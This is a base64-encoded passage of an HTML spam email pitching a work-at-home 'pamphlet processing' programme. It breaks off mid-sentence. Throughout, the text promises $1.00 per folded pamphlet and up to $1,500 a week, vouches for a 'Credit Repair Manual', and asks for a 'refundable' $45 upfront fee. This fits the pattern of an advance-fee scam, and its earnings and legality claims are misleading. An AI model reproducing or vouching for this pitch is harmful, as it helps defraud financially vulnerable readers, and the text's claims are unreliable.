 ICAgIDxicj4NCiAgICAgICAgQWxsIG9mIHRoZSB3b3JrIHRoYXQgeW91IHdpbGwgYmUgZG9pbmcg
 aXMgdmVyeTxicj4NCiAgICAgICAgc2ltcGxlIGFuZCBjYW4gYmUgZG9uZSBmcm9tIHlvdXIgZGVz
 ayBvciByaWdodCBhdDxicj4NCiAgICAgICAgeW91ciBraXRjaGVuIHRhYmxlLiZuYnNwOyBBcyBh
 IGhvbWUgd29ya2VyLCB5b3UgY2FuPGJyPg0KICAgICAgICB3b3JrIGZ1bGwgb3IgcGFydCB0aW1l
 IHdoZW5ldmVyIHlvdSBoYXZlIHRoZSBmcmVlPGJyPg0KICAgICAgICB0aW1lLCBtb3JuaW5ncywg
 YWZ0ZXJub29ucywgb3IgZXZlbmluZ3MuPGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIEluIGFk
 ZGl0aW9uLCB0aGVyZSBpcyBhYnNvbHV0ZWx5IG5vIGV4cGVyaWVuY2U8YnI+DQogICAgICAgIG5l
 Y2Vzc2FyeSBmb3IgeW91IHRvIHBhcnRpY2lwYXRlIGluIG91ciB3b3JrIGF0PGJyPg0KICAgICAg
 ICBob21lIGJhc2VkIGJ1c2luZXNzIHByb2dyYW0gITxicj4NCiAgICAgICAgPGJyPg0KICAgICAg
 ICBPdXIgd29yay1hdC1ob21lIHByb2dyYW0gaXMgcGVyZmVjdCBmb3I8YnI+DQogICAgICAgIGlu
 ZGl2aWR1YWxzIGludGVyZXN0ZWQgaW4gZWFybmluZyBhIHNlcmlvdXMgZXh0cmE8YnI+DQogICAg
 ICAgIGluY29tZSB0byBoZWxwIHBheSBvZmYgb2YgdGhlaXIgYmlsbHMgITxicj4NCiAgICAgICAg
 VGhhdCdzIHJpZ2h0ISBJZiB5b3UgaGF2ZSBjYXIgcGF5bWVudHMsIHJlbnQsPGJyPg0KICAgICAg
 ICBtb3J0Z2FnZSBwYXltZW50cywgY3JlZGl0IGNhcmQgYmlsbHMsIGxvYW48YnI+DQogICAgICAg
 IHBheW1lbnRzLCBldGMuPGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIFRoaXMgaXMgYW4gZXhj
 ZWxsZW50IG9wcG9ydHVuaXR5PC9mb250PjwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCI+IDxmb250
 IHNpemU9IjIiPmZvcg0KICAgICAgeW91IHRvPGJyPg0KICAgICAgc3VwcGxlbWVudCB5b3VyIGV4
 aXN0aW5nIGluY29tZSBhbmQ8YnI+DQogICAgICBzdGFydCBwdXR0aW5nIHNvbWUgZXh0cmEgbW9u
 ZXkgaW4geW91ciBwb2NrZXQhPGJyPg0KICAgICAgPGJyPg0KICAgICAgSWYgeW91IGFyZSBpbnRl
 cmVzdGVkIGluIHN1c3RhaW5pbmcgYWRkaXRpb25hbDxicj4NCiAgICAgIGluY29tZSBpbiB5b3Vy
 IGZyZWUgdGltZSwgdGhlIGZvbGxvd2luZzxicj4NCiAgICAgIGluZm9ybWF0aW9uIHdpbGwgaGVs
 cCB0byBmdXJ0aGVyIGV4cGxhaW4gdGhlIHZlcnk8YnI+DQogICAgICBwcm9maXRhYmxlIHdvcmst
 YXQtaG9tZSBwcm9ncmFtIHRoYXQgd2UgaGF2ZSB0bzxicj4NCiAgICAgIG9mZmVyIHlvdS48YnI+
 DQogICAgICA8YnI+DQogICAgICA8Yj48Zm9udCBjb2xvcj0iI2ZmMDAwMCI+LS0tLS0tLSZndDsg
 SW5jcmVkaWJsZSBIb21lIEJhc2VkPGJyPg0KICAgICAgT3Bwb3J0dW5pdHkgUHJvZ3JhbSA8L2Zv
 bnQ+PGk+PGZvbnQgY29sb3I9IiNmZjAwMDAiPkRFU0NSSVBUSU9OPGJyPg0KICAgICAgPC9mb250
 PjwvaT48L2I+T3VyIHByb2dyYW0gc2ltcGx5IGludm9sdmVzIHRoZSBmb2xkaW5nIGFuZDxicj4N
 CiAgICAgIHByb2Nlc3Npbmcgb2YgcGFtcGhsZXRzLiBZT1UgV0lMTCBSRUNFSVZFPGJyPg0KICAg
 ICAgQSBGVUxMICQxLjAwIEZPUiBFQUNIIEFORCBFVkVSWTxicj4NCiAgICAgIFBBTVBITEVUIFRI
 QVQgWU9VPC9mb250PiA8Zm9udCBzaXplPSIyIj5QUk9DRVNTITxicj4NCiAgICAgIDxicj4NCiAg
 ICAgIFdoYXQgZG8gd2UgbWVhbiBieSBwcm9jZXNzPzxicj4NCiAgICAgIEl0J3Mgc28gc2ltcGxl
 IEFOWU9ORSBjYW4gc3RhcnQgTk9XLi4uPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGk+PGI+U1RF
 UCAxOiZuYnNwOyA8L2I+PC9pPllvdSB3aWxsIG5lYXRseSBmb2xkIHRoZSBwcm92aWRlZCBwcmVw
 cmludGVkPGJyPg0KICAgICAgc2luZ2xlLXNpZGVkICg4IDEvMiBieSAxMSBpbmNoKSBwYW1waGxl
 dHMgaW50bzxicj4NCiAgICAgIHRoaXJkcyBbVGhlIHBhbXBobGV0IHRoYXQgeW91IHdpbGwgYmUg
 cHJvY2Vzc2luZzxicj4NCiAgICAgIHdpbGwgYmUgcHJvdmlkZWQgZm9yIHlvdSBhbmQgd2lsbCBi
 ZSBwcmludGVkIG9uPGJyPg0KICAgICAgcmVndWxhciAyMCBsYi4gKDgtMS8yIGJ5IDExKSBpbmNo
 IHBhcGVyLjxicj4NCiAgICAgIDxicj4NCiAgICAgIDxpPjxiPlNURVAgMjombmJzcDsgPC9iPjwv
 aT5Zb3Ugd2lsbCBuZWF0bHkgaW5zZXJ0IHRoZSBmb2xkZWQgcGFtcGhsZXRzPGJyPg0KICAgICAg
 aW50byB0aGUgcHJlLWFkZHJlc3NlZCwgcG9zdGFnZSBwYWlkIGVudmVsb3Blcy48YnI+DQogICAg
 ICA8YnI+DQogICAgICAoVGhlc2UgZW52ZWxvcGVzIHdpbGwgYmUgc2VudCBkaXJlY3RseSB0byB5
 b3VyIGhvbWUsPGJyPg0KICAgICAgZG9ybSBvciBhcGFydG1lbnQgd2l0aCBjdXN0b21lcnMnIG5h
 bWVzIGFuZDxicj4NCiAgICAgIGFkZHJlc3NlcyBhbHJlYWR5IHByaW50ZWQgb24gdGhlIGVudmVs
 b3BlcyBhbG9uZzxicj4NCiAgICAgIHdpdGggcG9zdGFnZSBhbHJlYWR5IGFmZml4ZWQgdG8gdGhl
 IGVudmVsb3Blcy4pPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGk+PGI+U1RFUCAzOiZuYnNwOyA8
 L2I+PC9pPkxpY2sgYW5kIHNlYWwgdGhlc2UgZW52ZWxvcGVzIGFuZCB0aGVuIHNlbmQ8YnI+DQog
 ICAgICB0aGVtIG91dCwgZGlyZWN0bHkgdG8gdGhlIGN1c3RvbWVycy4mbmJzcDsgSXQncyB0aGF0
 IHNpbXBsZSAhPGJyPg0KICAgICAgPGJyPg0KICAgICAgWW91IERPIE5PVCBwYXkgYW55IHBvc3Rh
 Z2UgY29zdHMgdG8gc2VuZCBvdXQgdGhlc2U8YnI+DQogICAgICBwYW1waGxldHMuIFRoZSBwcmUt
 YWRkcmVzc2VkLCBwb3N0YWdlIHBhaWQ8YnI+DQogICAgICBlbnZlbG9wZXMgd2lsbCBiZSBzZW50
 IGRpcmVjdGx5IHRvIHlvdXIgaG9tZSwgZG9ybTxicj4NCiAgICAgIG9yIGFwYXJ0bWVudC48YnI+
 DQogICAgICA8YnI+DQogICAgICBZb3Ugc2ltcGx5IGZvbGQgdGhlIHBhbXBobGV0cywgaW5zZXJ0
 IHRoZW0gaW4gdGhlPGJyPg0KICAgICAgZW52ZWxvcGVzIGFuZCBzZW5kIHRoZW0gcmlnaHQgb3V0
 ICE8YnI+DQogICAgICA8YnI+DQogICAgICBSZW1lbWJlciwgYWxsIG9mIHRoZSBwcm9jZXNzaW5n
 IHdvcmsgY2FuIGVhc2lseSBiZTxicj4NCiAgICAgIGRvbmUgYXQgeW91ciBkZXNrIG9yIHJpZ2h0
 IGF0IHlvdXIga2l0Y2hlbiB0YWJsZSE8YnI+DQogICAgICA8YnI+DQogICAgICA8aT48Yj48Zm9u
 dCBjb2xvcj0iI2ZmMDAwMCI+SU1QT1JUQU5UPGJyPg0KICAgICAgPC9mb250PjwvYj48L2k+V2Ug
 PHU+ZG88L3U+IHByb3ZpZGUgeW91IHdpdGggdGhlIGFjdHVhbCBwYW1waGxldCB0aGF0PGJyPg0K
 ICAgICAgeW91IHdpbGwgYmUgcHJvY2Vzc2luZyB3aGljaCBpcyBhIHNhbGVzIHBhbXBobGV0PGJy
 Pg0KICAgICAgZm9yIG91ciBDcmVkaXQgUmVwYWlyIE1hbnVhbC4gT3VyIENyZWRpdCBSZXBhaXI8
 YnI+DQogICAgICBNYW51YWwgaXMgYSBiZXN0LXNlbGxpbmcgZmluYW5jaWFsIHByb2R1Y3QgdGhh
 dDxicj4NCiAgICAgIG1hbnkgcGVvcGxlIGFyZSBvcmRlcmluZyBhbmQgdXNpbmcgdG8gbGVnYWxs
 eTxicj4NCiAgICAgIGNsZWFyIHVwIHRoZWlyIG5lZ2F0aXZlIGNyZWRpdC4mbmJzcDsgQW5kIHNp
 bmNlIHRoZTxicj4NCiAgICAgIGRlbWFuZCBmb3Igb3VyIENyZWRpdCBSZXBhaXIgTWFudWFsIGlz
 IHNvPGJyPg0KICAgICAgT1ZFUldIRUxNSU5HLCB5b3Ugd2lsbCBoYXZlIHRoZSBvcHBvcnR1bml0
 eTxicj4NCiAgICAgIHRvIHByb2Nlc3MgYXMgbWFueSBwYW1waGxldHMgYXMgeW91ciBzY2hlZHVs
 ZTxicj4NCiAgICAgIGNhbiBoYW5kbGUgITxicj4NCiAgICAgIDxicj4NCiAgICAgIFlvdSBjYW4g
 cHJvY2VzcyAxMDAuLi41MDAuLi4xLDAwMDxicj4NCiAgICAgIG9yIGV2ZW4gMSw1MDAgcGFtcGhs
 ZXRzIHBlciB3ZWVrLCB3ZWVrIGFmdGVyIHdlZWssPGJyPg0KICAgICAgbW9udGggYWZ0ZXIgbW9u
 dGgsIHllYXIgYWZ0ZXIgeWVhciAuLi4gZm9yIGFzIGxvbmc8YnI+DQogICAgICBhcyB5b3Ugd2lz
 aCB0byBwYXJ0aWNpcGF0ZSAhPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGZvbnQgY29sb3I9IiMw
 MDAwRkYiPjxiPjxpPkhPVyBNVUNIIE1PTkVZIENBTiBZT1UgRUFSTj88L2k+PC9iPjwvZm9udD48
 YnI+DQogICAgICBZT1UgV0lMTCBSRUNFSVZFIEEgRlVMTCAkMS4wMCBGT1IgRUFDSDxicj4NCiAg
 ICAgIEFORCBFVkVSWSBQQU1QSExFVCBUSEFUIFlPVSBQUk9DRVNTITxicj4NCiAgICAgIDxicj4N
 CiAgICAgIElmIHlvdSBwcm9jZXNzIDUwMCBwYW1waGxldHMgeW91IHdpbGwgcmVjZWl2ZSBhIGZ1
 bGw8YnI+DQogICAgICAkNTAwLjAwLi4uIElmIHlvdSBwcm9jZXNzIDEsMDAwIHBhbXBobGV0cyB5
 b3Ugd2lsbDxicj4NCiAgICAgIHJlY2VpdmUgYSBmdWxsICQxLDAwMC4wMC4uLiBpZiB5b3UgcHJv
 Y2VzcyAxLDUwMDxicj4NCiAgICAgIHBhbXBobGV0cyB5b3Ugd2lsbCByZWNlaXZlIGEgZnVsbCAk
 MSw1MDAuMDAuLi4gRXRjICE8YnI+DQogICAgICA8YnI+DQogICAgICA8L2ZvbnQ+PC9mb250Pjxm
 b250IGZhY2U9IkFyaWFsIiBzaXplPSIyIj5XaGF0J3MgZXZlbiBiZXR0ZXIgYWJvdXQgb3VyDQog
 ICAgICBwcm9ncmFtIGlzIHRoYXQgeW91PGJyPg0KICAgICAgTkVWRVIgaGF2ZSB0byB3b3JyeSBh
 Ym91dCB0aGUgc2FsZSBvZiBvdXIgQ3JlZGl0PGJyPg0KICAgICAgUmVwYWlyIE1hbnVhbCBpbiBv
 cmRlciB0byByZWNlaXZlIHlvdXIgJDEuMDAgcGVyPGJyPg0KICAgICAgcGFtcGhsZXQuIE91ciBw
 cm9ncmFtIERPRVMgTk9UIFdPUksgT048YnI+DQogICAgICBDT01NSVNTSU9OISBZb3Ugd2lsbCBy
 ZWNlaXZlIGEgRlVMTCAkMS4wMCBmb3I8YnI+DQogICAgICBlYWNoIGFuZCBldmVyeSBwYW1waGxl
 dCB0aGF0IHlvdSBwcm9jZXNzPGJyPg0KICAgICAgUkVHQVJETEVTUyBpZiBhbnkgc2FsZXMgYXJl
 IG1hZGUhIEV2ZW4gaWYgeW91PGJyPg0KICAgICAgcHJvY2VzcyAxLDUwMCBwYW1waGxldHMgYW5k
 IG5vIHNhbGVzIGFyZSBtYWRlLDxicj4NCiAgICAgIHlvdSB3aWxsIHN0aWxsIGVhcm4gQSBGVUxM
 ICQxLDUwMC4wMCEgSXQncyBzaW1wbGUsIHByb2Nlc3M8YnI+DQogICAgICAxLDUwMCBwYW1waGxl
 dHMsIGFuZCByZWNlaXZlIEEgRlVMTCAkMSw1MDAuMDAgZm9yPGJyPg0KICAgICAgeW91ciB0aW1l
 IGFuZCBlZmZvcnQhIFByb2Nlc3NpbmcgcGF5bWVudHMgYW5kPGJyPg0KICAgICAgYWRkaXRpb25h
 bCBwcm9jZXNzaW5nIG1hdGVyaWFscyB3aWxsIGNvbnRpbnVlIHRvIGFycml2ZTxicj4NCiAgICAg
 IGF0IHlvdXIgaG9tZSwgZG9ybSBvciBhcGFydG1lbnQgZm9yIGFzIGxvbmcgYXMgeW91PGJyPg0K
 ICAgICAgd2lzaCB0byBjb250aW51ZSBwYXJ0aWNpcGF0aW5nIGluIHRoZSBwcm9ncmFtITxicj4N
 CiAgICAgIDxicj4NCiAgICAgIFRoYXQncyByaWdodCwgeW91IGNhbiBhbHdheXMgaGF2ZSBtb25l
 eSBjb21pbmcgaW48YnI+DQogICAgICB3ZWVrIGFmdGVyIHdlZWsgYmVjYXVzZSBwcm9jZXNzaW5n
 IHBheW1lbnRzIGFuZDxicj4NCiAgICAgIGFkZGl0aW9uYWwgcHJvY2Vzc2luZyBtYXRlcmlhbHMg
 d2lsbCBjb250aW51ZSB0bzxicj4NCiAgICAgIGFycml2ZSBhdCB5b3VyIGhvbWUsIGRvcm0gb3Ig
 YXBhcnRtZW50IGZvciBhcyBsb25nPGJyPg0KICAgICAgYXMgeW91IHdpc2ggdG8gcGFydGljaXBh
 dGUhPGJyPg0KICAgICAgPGJyPg0KICAgICAgPC9mb250Pjxmb250IHNpemU9IjIiPjxmb250IGZh
 Y2U9IkFyaWFsIiBzaXplPSIyIj5Ib25lc3RseSwgdGhlcmUgaXMgTk8NCiAgICAgIEdVRVNTV09S
 Sy4mbmJzcDsgT3VyIHByb2dyYW08YnI+DQogICAgICBoYXMgPC9mb250Pjxmb250IGZhY2U9IkFy
 aWFsIj5iZWVuIGFyb3VuZCBmb3Igc2V2ZXJhbCB5ZWFycyBhbmQgaXMgdmVyeTxicj4NCiAgICAg
 IHN1Y2Nlc3NmdWwhPGJyPg0KICAgICAgPGI+PGJyPg0KICAgICAgPGZvbnQgY29sb3I9IiMwMDAw
 RkYiPjxpPkZBQ1Q8L2k+PC9mb250Pjxicj4NCiAgICAgIDwvYj5FdmVuIHdvcmtpbmcgc2xvd2x5
 LCB5b3UgY291bGQgc3RpbGwgZWFybiBhIE1VQ0g8YnI+DQogICAgICBCRVRURVIgd2Vla2x5IGlu
 Y29tZSB0aGFuIG1vc3QgcmVndWxhciA5OjAwIEFNIHRvPGJyPg0KICAgICAgNTowMCBQTSBqb2Jz
 ITxicj4NCiAgICAgIFRIRVJFIElTIE5PIEVYUEVSSUVOQ0UgUkVRVUlSRUQ8YnI+DQogICAgICBU
 TyBQQVJUSUNJUEFURSBJTiBPVVIgUFJPR1JBTTxicj4NCiAgICAgIEFueW9uZSwgeW91bmcgb3Ig
 b2xkLCBtYWxlIG9yIGZlbWFsZSwgYW55d2hlcmUgaW48YnI+DQogICAgICB0aGUgVW5pdGVkIFN0
 YXRlcyBjYW4gZWFzaWx5IGVhcm4gZ3JlYXQgbW9uZXk8YnI+DQogICAgICBwYXJ0aWNpcGF0aW5n
 IGluIG91ciBQYW1waGxldCBQcm9jZXNzaW5nIFByb2dyYW0hPGJyPg0KICAgICAgVGhlIHJlYXNv
 biB3aHkgb3VyIHByb2dyYW0gZG9lcyBub3QgcmVxdWlyZSBhbnk8YnI+DQogICAgICBleHBlcmll
 bmNlIGlzIHNpbXBsZS4uLiBpdCBkb2VzIG5vdCB0YWtlIGFueSBwcmV2aW91czxicj4NCiAgICAg
 IGV4cGVyaWVuY2UgdG8gZm9sZCBhIHBhbXBobGV0LCBpbnNlcnQgaXQgaW50byBhbiBlbnZlbG9w
 ZSw8YnI+DQogICAgICBhbmQgc2VhbCBhbiBlbnZlbG9wZS4gUGx1cywgb3VyIHByb2dyYW0gaXMg
 ZXNwZWNpYWxseTxicj4NCiAgICAgIGJlbmVmaWNpYWwgZm9yIHBlb3BsZSB3aG8gbmVlZCB0byBl
 YXJuIGEgc2VyaW91czxicj4NCiAgICAgIGV4dHJhIGluY29tZSBidXQgbWlnaHQgbm90IGhhdmUg
 dGhlIHNwYXJlIHRpbWUgZm9yPGJyPg0KICAgICAgYSBzZWNvbmQgam9iLjxicj4NCiAgICAgIEFz
 IHN0YXRlZCwganVzdCBhIGZldyBob3VycyBwZXIgZGF5IGNvdWxkIHBvc3NpYmx5PGJyPg0KICAg
 ICAgZWFybiB5b3Ugd2VsbCBvdmVyICQ1MDAuMDAgcGVyIHdlZWsuLi4gTk8gSk9LRSE8YnI+DQog
 ICAgICBKdXN0IGltYWdpbmUgaG93IG5pY2UgaXQgd291bGQgYmUgaWYgeW91IGNvdWxkPGJyPg0K
 ICAgICAgZWFybiBhbiBleHRyYSAkNTAwLjAwIHRvICQxLDUwMC4wMCBwZXIgd2Vlazxicj4NCiAg
 ICAgIHdvcmtpbmcgZnJvbSB5b3VyIGhvbWUuLi5ubyBtb3JlIGFubm95aW5nPGJyPg0KICAgICAg
 Ym9zcy4uLm5vIG1vcmUgaGVjdGljIHJ1c2ggaG91ciBjb21tdXRpbmcuLi5ubzxicj4NCiAgICAg
 IG1vcmUgc3RyZXNzZnVsIDkgdG8gNSBqb2IsIGFuZCBubyBtb3JlIGhlYWRhY2hlcyAhPGJyPg0K
 ICAgICAgPGJyPg0KICAgICAgPGI+PGk+PGZvbnQgY29sb3I9IiMwMDAwRkYiPkZBQ1Q8L2ZvbnQ+
 PC9pPjxicj4NCiAgICAgIDwvYj5QcmFjdGljYWxseSBldmVyeSB0eXBlIG9mIHBlcnNvbiBjYW4g
 YmVuZWZpdDxicj4NCiAgICAgIGZpbmFuY2lhbGx5IGZyb20gb3VyIFBhbXBobGV0IFByb2Nlc3Np
 bmcgUHJvZ3JhbS48YnI+DQogICAgICBJTVBPUlRBTlQgTEVHQUwgSU5GT1JNQVRJT048YnI+DQog
 ICAgICBUaGUgaW5mb3JtYXRpb24gY29udGFpbmVkIGluIG91ciBDcmVkaXQgUmVwYWlyPGJyPg0K
 ICAgICAgTWFudWFsIGlzIDEwMCUgTGVnYWwgYW5kIExlZ2l0aW1hdGUhIEluIGZhY3QsPGJyPg0K
 ICAgICAgdGhlcmUgYXJlIGh1bmRyZWRzIG9mIGxhd3llcnMgYW5kIGF0dG9ybmV5cyBhbGw8YnI+
 DQogICAgICBvdmVyIHRoZSBjb3VudHJ5IHVzaW5nIHRoaXMgdmFsdWFibGUgaW5mb3JtYXRpb248
 YnI+DQogICAgICBhbmQgY2hhcmdpbmcgcGVvcGxlIGJpZyBtb25leSB0byByZW1vdmUgbmVnYXRp
 dmU8YnI+DQogICAgICBhbmQgaW5jb3JyZWN0IGl0ZW1zIGZyb20gdGhlaXIgY3JlZGl0IGZpbGVz
 ITxicj4NCiAgICAgIEhvd2V2ZXIsIG91ciBDcmVkaXQgUmVwYWlyIE1hbnVhbCBleHBsYWlucyBo
 b3c8YnI+DQogICAgICBwZW9wbGUgY2FuIGRvIHRoZSBWRVJZIFNBTUUgVEhJTkcgdGhhdCB0aGVz
 ZTxicj4NCiAgICAgIGNvc3RseSBhdHRvcm5leXMgYXJlIGRvaW5nIGV4Y2VwdCBvdXIgY3JlZGl0
 PGJyPg0KICAgICAgcmVwYWlyIG1hbnVhbCBzaG93cyBwZW9wbGUgaG93IHRvIHJlcGFpciB0aGVp
 cjxicj4NCiAgICAgIGNyZWRpdCBGQVNULCBFQVNZIGFuZCBmb3IgRlJFRSB3aXRob3V0IGhhdmlu
 ZyB0bzxicj4NCiAgICAgIGhpcmUgYW4gYXR0b3JuZXkgITxicj4NCiAgICAgIDxicj4NCiAgICAg
 IE5vdyBpcyB0aGUgdGltZSwgdGhlcmUgYXJlIFRFTlMtT0YtTUlMTElPTlMgb2Y8YnI+DQogICAg
 ICBBbWVyaWNhbnMgd2l0aCBiYWQgY3JlZGl0IHRoYXQgd291bGQgcHJvYmFibHkgbG92ZTxicj4N
 CiAgICAgIHRvIHJlY2VpdmUgb3VyIENyZWRpdCBSZXBhaXIgTWFudWFsICE8YnI+DQogICAgICBU
 aGVyZWZvcmUsIGlmIHlvdSBhcmUgc2VyaW91cyBhYm91dCBkZXZvdGluZyBhPGJyPg0KICAgICAg
 ZmV3IGhvdXJzIHBlciB3ZWVrIHRvd2FyZHMgdGhlIG9wcG9ydHVuaXR5IG9mPGJyPg0KICAgICAg
 ZWFybmluZyBhbiBob25lc3QgZXh0cmEgaW5jb21lLCBvdXIgJDEuMDAgUGFtcGhsZXQ8YnI+DQog
 ICAgICBQcm9jZXNzaW5nIFByb2dyYW0gaXMgUEVSRkVDVCBGT1IgWU9VITxicj4NCiAgICAgIDxi
 cj4NCiAgICAgIDwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCIgY29sb3I9IiNGRjAwMDAiPjxiPi0t
 LS0tLS0tLSZndDsgSWYgeW91IGhhdmUgdGhlDQogICAgICBERVNJUkUuLi48YnI+DQogICAgICA8
 L2I+PC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj50byBwYXJ0aWNpcGF0ZSwgd2Ugd2lsbCBzZW5k
 IHlvdSBhIFN0YXJ0ZXIncw0KICAgICAgS2l0PGJyPg0KICAgICAgY29udGFpbmluZyB0aGUgaW5z
 dHJ1Y3Rpb25zIG5lY2Vzc2FyeSBmb3IgeW91IHRvPGJyPg0KICAgICAgYmVnaW4gcGFydGljaXBh
 dGluZyBJTU1FRElBVEVMWSBpbiBvdXIgUGFtcGhsZXQ8YnI+DQogICAgICBQcm9jZXNzaW5nIFBy
 b2dyYW0gITxicj4NCiAgICAgIDxicj4NCiAgICAgIFBsdXMsIHlvdXIgU3RhcnRlcnMgS2l0IGFs
 c28gY29udGFpbnMgWU9VUiBWRVJZPGJyPg0KICAgICAgT1dOIGNvcHkgb2YgQ3JlZGl0IFJlcGFp
 ciBNYW51YWwgITxicj4NCiAgICAgIDxicj4NCiAgICAgIFRoYXQncyByaWdodCB5b3UgY2FuIHVz
 ZSBvdXIgYmVzdC1zZWxsaW5nIG1hbnVhbDxicj4NCiAgICAgIHRvIGxlZ2FsbHkgY2xlYXIgdXAg
 YW5kIHJlcGFpciBhbnkgbmVnYXRpdmUgY3JlZGl0PGJyPg0KICAgICAgdGhhdCB5b3UgbWF5IGhh
 dmUgITxicj4NCiAgICAgIDxicj4NCiAgICAgIFRoaXMgbWFudWFsIGlzIGluY2x1ZGVkIGZvciBi
 ZWNvbWluZyBhPGJyPg0KICAgICAgbWVtYmVyIG9mIG91ciBQYW1waGxldCBQcm9jZXNzaW5nIFBy
 b2dyYW0gITxicj4NCiAgICAgIDxicj4NCiAgICAgIFRoZXJlZm9yZSwgdG8gZ2V0IHN0YXJ0ZWQg
 aW1tZWRpYXRlbHksIGFsbCB0aGF0PGJyPg0KICAgICAgb3VyIGNvbXBhbnkgcmVxdWlyZXMgaXMg
 YSBvbmUtdGltZSByZWZ1bmRhYmxlPGJyPg0KICAgICAgb3JkZXItcHJvY2Vzc2luZyBmZWUgb2Yg
 b25seSAkNDUuPGJyPg0KICAgICAgUGxlYXNlIHVuZGVyc3RhbmQsIHdlIGNhbm5vdCBhZmZvcmQg
 dG88YnI+DQogICAgICBzZW5kIG91dCBhIHBhY2thZ2Ugb2YgdmFsdWFibGUgbWF0ZXJpYWxzIHRv
 PGJyPg0KICAgICAgZXZlcnlvbmUgaW50ZXJlc3RlZCBpbiBvdXIgcHJvZ3JhbS4gQW5kIGFsc28g
 a2VlcDxicj4NCiAgICAgIGluIG1pbmQgdGhhdCBvbmNlIHlvdSBwcm9jZXNzIDEwMCBwYW1waGxl
 dHMgeW91PGJyPg0KICAgICAgd2lsbCBoYXZlIGFscmVhZHkgZWFybmVkIHlvdXIgJDQ1IGJhY2sg
 YW5kIGFyZTxicj4NCiAgICAgIGxlZnQgd2l0aCBhbiBleHRyYSAkNTUgcHJvZml0ICEhITxicj4N
 CiAgICAgIDxicj4NCiAgICAgIFdlIG11c3QgY2hhcmdlIGEgc21hbGwgcHJvY2Vzc2luZyBmZWUg
 dG88YnI+DQogICAgICBlbnN1cmUgdGhhdCBvbmx5IHNlcmlvdXMgaW5kaXZpZHVhbHMgaW50ZW5k
 IHRvPGJyPg0KICAgICAgcGFydGljaXBhdGUgaW4gb3VyIHByb2dyYW0uJm5ic3A7IEtlZXAgaW4g
 bWluZCwgeW91PGJyPg0KICAgICAgTkVWRVIgaGF2ZSB0byBwYXkgdXMgYW55IG90aGVyIGZlZXMg
 YW5kIHlvdSBjYW48YnI+DQogICAgICBwYXJ0aWNpcGF0ZSBmb3IgYXMgbG9uZyBhcyB5b3Ugd2lz
 aCEgVGhpcyBmZWU8YnI+DQogICAgICBzaW1wbHkgYXNzdXJlcyBvdXIgY29tcGFueSB0aGF0IHlv
 dSBhcmUgaW5kZWVkPGJyPg0KICAgICAgc2VyaW91cyBhYm91dCBvdXIgcHJvZ3JhbSBhbmQgdGhl
 IG9wcG9ydHVuaXR5IHRvPGJyPg0KICAgICAgbWFrZSBnb29kIG1vbmV5IHdvcmtpbmcgZnJvbSB5
 b3VyIGhvbWUuIFNvcnJ5LCB3ZTxicj4NCiAgICAgIENBTiBOT1QgcHJvY2VzcyB5b3VyIG9yZGVy
 IGZvcm0gd2l0aG91dCB0aGU8YnI+DQogICAgICBvbmUtdGltZSBwcm9jZXNzaW5nIGZlZSBzaW5j
 ZSB0aGVyZSBhcmUgZmFyPGJyPg0KICAgICAgdG9vIG1hbnkgc2VyaW91cyBpbmRpdmlkdWFscyB3
 aWxsaW5nIHRvIHBheSB0aGlzPGJyPg0KICAgICAgc21hbGwgb25lLXRpbWUgZmVlIGluIG9yZGVy
 IHRvIHBhcnRpY2lwYXRlIGluIG91cjxicj4NCiAgICAgIGhpZ2ggcHJvZml0IHdvcmstYXQtaG9t
 ZSBwcm9ncmFtLiBUaGVyZWZvcmUsIGFsbDxicj4NCiAgICAgIHlvdSBoYXZlIHRvIGRvIGlzIGp1
 c3QgY29tcGxldGUsIHByaW50LCBzaWduLCBhbmQ8YnI+DQogICAgICBzZW5kIGluIHRoZSBPcmRl
 ciBGb3JtIChGT1JNIEFHTS0yMjI6IDE2LkYpLjxicj4NCiAgICAgIDxicj4NCiAgICAgIFBsZWFz
 ZSwgYmUgc3VyZSB0byBjb21wbGV0ZSB0aGUgT3JkZXIgRm9ybSBJTjxicj4NCiAgICAgIEZVTEws
 IGxlZ2libGUsIHdpdGggeW91ciBjb3JyZWN0IHNoaXBwaW5nIGFkZHJlc3M8YnI+DQogICAgICBp
 biBvcmRlciB0byBwcmV2ZW50IGFueSBwcm9jZXNzaW5nIGRlbGF5cyBpbjxicj4NCiAgICAgIHRo
 ZSBzaGlwbWVudCBvZiB5b3VyIHBhY2thZ2UuIFRoYXQncyByaWdodCwgaWYgeW91PGJyPg0KICAg
 ICAgYXJlIHJlYWxseSBsb29raW5nIGZvciBhIDEwMCUgTEVHQUwgYW5kIExFR0lUSU1BVEU8YnI+
 DQogICAgICBob21lIGJhc2VkIGluY29tZSBvcHBvcnR1bml0eSB3ZSBjYW4gaG9uZXN0bHkgc2F5
 PGJyPg0KICAgICAgdGhhdCB5b3UgaGF2ZSBmaW5hbGx5IGZvdW5kIHRoZSByaWdodCBjb21wYW55
 IHdpdGg8YnI+DQogICAgICBhbiBob25lc3QgYW5kIHByb3ZlbiBtb25leSBtYWtpbmcgcHJvZ3Jh
 bSE8YnI+DQogICAgICA8YnI+DQogICAgICBQLlMuIEtOT1cgQSBGUklFTkQgV0hPIE1JR0hUIEJF
 IElOVEVSRVNURUQ/PGJyPg0KICAgICAgUFJJTlQgQSBDT1BZIEZPUiBBTEwgWU9VUiBGUklFTkRT
 IEFORCBGQU1JTFkuPGJyPg0KICAgICAgPC9mb250Pg0KICAgICAgPGZvbnQgZmFjZT0iQXJpYWwi
 PkFORCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDAwRkYiIGZhY2U9IkFyaWFsIj48Yj48aT5ERURV
 Q1QNCiAgICAgICQxMCBGUk9NIFlPVVIgT1JERVIuLi48YnI+DQogICAgICA8YnI+DQogICAgICA8
 L2k+PC9iPjwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCI+QXMgYSBib251cywgZGVkdWN0ICQxMCBm
 b3IgZWFjaCAmYW1wOw0KICAgICAgZXZlcnkgYWRkaXRpb25hbDxicj4NCiAgICAgIG9yZGVyIGZv
 ciB0aGUgU3RhcnRlciBJbnRlcmFjdGl2ZSBDRCBST00gZnJvbTxicj4NCiAgICAgIGFueWJvZHkg
